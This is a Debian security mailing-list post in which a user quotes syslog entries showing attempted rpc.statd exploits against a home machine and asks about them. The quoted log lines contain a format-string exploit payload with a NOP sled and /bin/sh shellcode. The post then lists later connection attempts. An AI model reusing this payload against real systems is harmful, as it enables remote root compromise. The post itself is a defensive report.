Hello,
I run a pc with potato on a cable modem line. Recently I discovered the
following in /var/log/messages:
Jun 10 20:21:16 pflanze -- MARK --
Jun 10 20:33:55 pflanze
Jun 10 20:33:55 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 10 20:33:55 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 10 21:01:16 pflanze -- MARK --
Jun 11 13:41:16 pflanze -- MARK --
Jun 11 13:47:10 pflanze
Jun 11 13:47:10 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n
%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\
Jun 11 13:47:10 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 11 14:01:16 pflanze -- MARK --
Jun 12 09:01:16 pflanze -- MARK --
Jun 12 09:09:47 pflanze
Jun 12 09:09:47 pflanze /sbin/rpc.statd[229]: gethostbyname error for
^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\
220\220\220\220\220\220\220\220\220\220\220\220\220
Jun 12 09:09:47 pflanze
Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
Jun 12 09:21:16 pflanze -- MARK --
Seems like a buffer overflow. (Is it happening in rpc.statd or in named or
somewhere else?)
I've now removed nfs-common && nfs-server. (BTW there's still running a
daemon (portmap, from netbase) on the sunrpc port - I thought sunrpc is
only (mainly?) for NFS?)
After that I've installed ippl, which gives some interesting output as
well:
Jun 17 04:13:24 asp connection attempt from ACBDC962.ipt.aol.com
[172.189.201.98]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
[66.66.4.173]
Jun 17 10:27:38 asp connection attempt from syr-66-66-4-173.twcny.rr.com
[66.66.4.173]
Jun 17 11:04:36 webcache connection attempt from
ppp45-net1-idf2-bas1.isdnet.net [195.154.50.45]
Jun 17 18:14:47 sunrpc connection attempt from
h24-79-83-253.vc.shawcable.net [24.79.83.253]
Jun 17 18:17:07 sunrpc connection attempt from skola8.zakladni-skola.cz
[62.168.55.246]
Jun 18 00:07:26 port 445 connection attempt from 62.2.179.7
Jun 18 00:07:26 port 445 connection attempt from [62.2.179.7]
Jun 18 00:07:27 port 445 connection attempt from [62.2.179.7]
Now when I think about it these will probably all be harmless (maybe
others on this cable modem subnet were serving stuff when they had my ip).
If yes, please apologize my anxiety.
.christian.
-- To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org